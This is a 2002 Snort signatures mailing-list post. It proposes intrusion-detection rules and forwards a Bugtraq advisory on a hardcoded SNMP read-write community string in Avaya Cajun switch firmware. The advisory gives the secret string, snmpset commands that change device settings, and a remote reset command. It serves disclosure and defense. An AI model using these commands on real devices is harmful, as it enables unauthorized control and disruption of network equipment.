[Snort-sigs] FW: SNMP vulnerability in AVAYA Cajun firmware

Clemens, Dan Dan.Clemens at ...678...
Mon Aug 5 13:47:01 EDT 2002


alert udp $EXTERNAL_NET any -> $HOME_NET 161 \
(msg:"INCOMING AVAYA Cajun Firmware R+W SNMP ACCESS" \
content:"NoGaH$@!" classtype: misc-attack;)

alert udp $HOME_NET any -> $EXTERNAL_NET 161 \
(msg:"OUTGOING AVAYA Cajun Firmware R+W SNMP ACCESS" \
content:"NoGaH$@!" classtype: misc-attack;)

Thoughts comments?

-Dan
-----Original Message-----
From: Jacek Lipkowski [mailto:sq5bpf at ...727...]
Sent: Monday, August 05, 2002 12:01 PM
To: bugtraq at ...113...
Subject: SNMP vulnerability in AVAYA Cajun firmware 


1. Problem Description

There exists an undocumented SNMP r/w community string in firmware for
Avaya Cajun P33x series hardware. This allows anyone having SNMP access to
the device to administer it.

2. Tested systems

The following versions were tested and found vulnerable:

Avaya Cajun P330T software version 3.8.2 and 3.9.1
Avaya Cajun P333R software version 3.8.1 and 3.9.1

Additionaly firmware for P130, M770-ATM and M770 Supervisor (M-SPX, M-SPS)
was found to be vulnerable.


3. Details

Various Cajun firmware contains an undocumented community r/w string
NoGaH$@!
To test try:

sq5bpf at ...728...:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = AsnNull
sq5bpf at ...728...:~$ snmpset 192.168.0.3 'NoGaH$@!' system.sysName.0 s 'Hello
there :)'
system.sysName.0 = Hello there :)
sq5bpf at ...728...:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = Hello there :)

Reset a Cajun switch remotely (fun party trick):

sq5bpf at ...728...:~$ snmpset 192.168.0.3 'NoGaH$@!' .1.3.6.1.4.1.81.7.7.0 i 1
enterprises.81.7.7.0 = 1


4. Recommendations

As always it is good administrative practice to block SNMP at the
firewall, especially now after the release of the PROTOS SNMP testing
suite. However, the vulnerability is also present on P333R router
interfaces, which have a higher chance of being exposed to the outside
world:

sq5bpf at ...728...:~$ snmpget 192.168.0.4 'NoGaH$@!' system.sysDescr.0
system.sysDescr.0 = Avaya Inc. - P333R , SW version 3.9.1 , CS 2.4

If for some reason the user is unable to upgrade to a fixed version, in
order to mitigate the bug one can restrict SNMP access using the
'set allowed managers' command, which appeared in recent Cajun firmware.


5. Vendor status

AVAYA was informed on 27 May 2002. The vendor responded on May 28 2002. As
the vendor proved responsive and worked promptly on the problem, I have
agreed to release the information after the release of fixed software. The
fixed software has been released on July 4, and is avaliable from the
Avaya support site http://support.avaya.com. Official AVAYA security
advisories are located at http://support.avaya.com/security/


6. Disclaimer

Neither I nor my employer is responsible for the use or misuse of
information in this advisory.  The opinions expressed are my own and not
of any company.  Any use of the information is at the user's own risk.


Jacek Lipkowski sq5bpf at ...727...

Andra Co. Ltd.
ul Wynalazek 6
02-677 Warsaw, Poland
http://www.andra.com.pl
Confidentiality Notice:  This e-mail communication and any attachments may
contain confidential and privileged information for the use of the
designated recipients named above.  If you are not the intended recipient,
you are hereby notified that  you have received this communication in error
and that any review, disclosure, dissemination, distribution or copying of
it or its contents is prohibited.  If you have received this communication
in error, please notify me immediately by replying to this message and
deleting it from your computer.  Thank you.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20020805/19c0b559/attachment.html>


More information about the Snort-sigs mailing list